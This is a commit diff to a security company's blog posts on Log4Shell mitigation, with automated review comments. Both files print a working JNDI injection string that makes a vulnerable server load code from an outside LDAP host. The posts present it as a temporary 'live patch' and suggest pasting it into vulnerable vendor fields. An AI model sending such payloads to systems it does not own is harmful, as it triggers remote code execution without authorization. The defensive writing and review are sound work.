Commit

Add links back to other posts
freeqaz committed Dec 16, 2021
1 parent 33bbf9c commit 7a305f7
Showing 2 changed files with 15 additions and 5 deletions.
13 changes: 9 additions & 4 deletions docs/blog/2021-12-12-log4j-zero-day-mitigation-guide.mdx
@@ -306,12 +306,19 @@ Because of the extensive control Log4Shell gives an attacker, it's actually poss
This isn't the recommended strategy for various reasons, but it could be a last resort for systems that you can't easily restart or modify. Note that doing this on a system
you don't have permission to is most likely illegal. The fix will only work until the server (or the JVM) is restarted.

You use our hosted version here to patch yourself:
We've published articles about this exploit that you can use to learn more about how it works.
- **[Overview (When to use it)](https://www.lunasec.io/docs/blog/log4shell-live-patch/)**,
- **[Technical Deep-dive](https://www.lunasec.io/docs/blog/log4shell-live-patch-technical)**

#### Hosted Exploit Payload

```
${jndi:ldap://patch.log4shell.com:1389/a}
```

Just simply paste that anywhere into your server where you're vulnerable, and it will work. (For example, in the `main` function when you start up your server)
Just simply paste that anywhere into your server where you're vulnerable, and it will patch you against future
exploitation. (For example, in the `main` function when you start up your server, or a known vulnerable field if it's
a vendor product you depend on.)

We have added this functionality to the [latest release](https://github.com/lunasec-io/lunasec/releases) of our
Log4Shell CLI tool if you'd prefer to run the server yourself instead.
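Review bot: the rewritten sentence "it will patch you against future exploitation" overstates the effect relative to the unchanged context above, which says the fix "will only work until the server (or the JVM) is restarted"; say "until the next JVM restart" rather than "future exploitation". The new clause "or a known vulnerable field if it's a vendor product you depend on" also invites sending the payload into third-party software, so it should repeat the authorization caveat from the preceding paragraph and make clear that the patch only takes effect if the string is actually logged by a vulnerable Log4j and the JVM can reach patch.log4shell.com:1389 over LDAP. Minor: "Just simply" is redundant, the first bullet ends with a stray comma after `**[Overview (When to use it)](...)**`, and the two new links differ on the trailing slash (`log4shell-live-patch/` vs `log4shell-live-patch-technical`).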
@@ -325,8 +332,6 @@ If you need a permanent solution for Log4Shell, please check out our commercial
[Live Patch service](https://www.lunasec.io/pages/live-dependency-patching) for a production-ready alternative.
:::

How it works and how to accomplish it manually is explained in [this guide](https://github.com/Cybereason/Logout4Shell). Our implementation is based on the work they did.

## How to protect yourself from future 0-days

It's becoming increasingly apparent that Log4Shell is not going to be the last vulnerability of its kind. Any trusted dependency
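Review bot: deleting the line "How it works and how to accomplish it manually is explained in [this guide](https://github.com/Cybereason/Logout4Shell). Our implementation is based on the work they did." drops the only attribution to the Logout4Shell technique this patch builds on. If the intent is to consolidate links into the new deep-dive bullets, keep the credit here or state explicitly that it has moved into the linked technical deep-dive rather than removing it silently.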
7 changes: 6 additions & 1 deletion docs/blog/2021-12-15-log4shell-live-patch.mdx
@@ -36,12 +36,17 @@ authors:
-->

**TL;DR:** This string will temporarily fix your systems by patching them against Log4Shell, but *please* read the rest
of this post before you use it!
of this post before you use it! **Update:** We
[posted a follow-up post](https://www.lunasec.io/docs/blog/log4shell-live-patch-technical) with a technical deep-dive
into how this exploit works.

```
${jndi:ldap://patch.log4shell.com:1389/a}
```

_If you're looking for resources on how to detect and patch yourself against Log4Shell, please also read our in-depth
[Mitigation Guide](https://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide)._

## Why Log4Shell is an especially painful vulnerability

Mitigating a vulnerability in a single dependency used by your project typically requires a lot of work:
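Review bot: "posted a follow-up post" repeats "post"; prefer "published a follow-up" or "added a follow-up post". The Update sentence also interrupts the TL;DR between the warning to read the rest of the post and the payload it refers to; moving it into its own paragraph after the code block, next to the added Mitigation Guide pointer, keeps the TL;DR self-contained and groups the two cross-links together.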